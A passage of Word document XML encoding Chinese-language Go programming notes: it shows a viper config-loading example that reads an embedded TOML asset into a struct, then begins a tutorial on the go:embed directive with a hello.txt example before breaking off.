        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>Special struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25822B35" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>CheckRule   string `toml:"check_rule"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC061EE" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>Description string `toml:"description"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28799A7D" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>Advice      string `toml:"advice"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C287BA2" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>} `toml:"special"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181BE7F8" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>} `toml:"password"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019EE113" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>} `toml:"settings"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F63942C" w14:textId="472D506C" w:rsidR="004014B4" w:rsidRPr="004014B4" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08965D86" w14:textId="7EAC7006" w:rsidR="004014B4" w:rsidRDefault="004014B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38528689" w14:textId="52AF21F0" w:rsidR="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>viper</w:t>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>读取配置文件后读取到结构体中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B5C783" w14:textId="0FB39F78" w:rsidR="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BFD7A7F" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func (</w:t>
      </w:r>
      <w:r w:rsidRPr="00A56C25">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>o *Output</w:t>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>) GetDefault() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665124C3" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00872AFE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>outputConfig := viper.New()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FC49BF" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00872AFE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>bindataOutputDefaultToml, _ := bindata.Asset("output.toml")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A5F65B" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00872AFE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>outputConfig.SetConfigType("toml")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E8F652" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err := outputConfig.ReadConfig(bytes.NewBuffer(bindataOutputDefaultToml)); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3E8BE4" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>panic("unable to load output config")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D899D72" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>panic(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4369DC61" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F385765" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00872AFE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>outputConfig.Unmarshal(o)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F97EE1" w14:textId="3F7D9595" w:rsidR="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8ADB28" w14:textId="0CD9745E" w:rsidR="004014B4" w:rsidRDefault="004014B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D51F785" w14:textId="28A53A7E" w:rsidR="004014B4" w:rsidRDefault="004014B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65C1BB07" w14:textId="77777777" w:rsidR="004014B4" w:rsidRDefault="004014B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="114928F5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="368" w:name="_Toc159779819"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>embed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">go:embed: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打包嵌入文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="368"/>
    </w:p>
    <w:p w14:paraId="3EB4F52D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译的程序非常适合部署，如果没有通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CGO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用其它的库的话，我们一般编译出来的可执行二进制文件都是单个的文件，非常适合复制和部署。在实际使用中，除了二进制文件，可能还需要一些配置文件，或者静态文件，比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模板、静态的图片、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等文件，如何这些文件也能打进到二进制文件中，那就太美妙，我们只需复制、按照单个的可执行文件即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2EA5B3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B97A282" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一些开源的项目很久以前就开始做这方面的工作，比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gobuffalo/packr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>markbates/pkger</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rakyll/statik</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>knadh/stuffbin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等等，但是不管怎么说这些都是第三方提供的功能，如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方能内建支持就好了。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2019</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>末一个提案被提出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>issue#35950,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>期望</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方编译器支持嵌入静态文件。后来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Russ Cox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>专门写了一个设计文档</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Go command support for embedded static assets, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并最终实现了它。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0342574E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="231C0B67" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Go 1.16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中包含了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go embed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的功能，而且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Go1.16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本在一个月左右的时间就会发布了，到时候你可以尝试使用它，如果你等不及了，你也可以下载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Go 1.16beta1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝鲜。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EE2D84" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D54C2D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本文将通过例子，详细介绍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go embed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的各个功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C2D006" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67B358EF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如当前文件下有个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hello.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的文件，文件内容为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hello,world!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go:embed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指令，在编译后下面程序中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变量的值就变为了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hello,world!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6667B219" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33284ACA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC9FBD4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>_ "embed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECEC2B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0FCF80" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42983B30" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>//go:embed hello.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65238A89" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>var s string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F868B67" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079EBBE6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9B12FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3442BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EF10370" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>嵌入为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>byte slice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1D8AB2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你还可以把单个文件的内容嵌入为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>slice of byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也就是一个字节数组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5EB28B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AF45D35" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
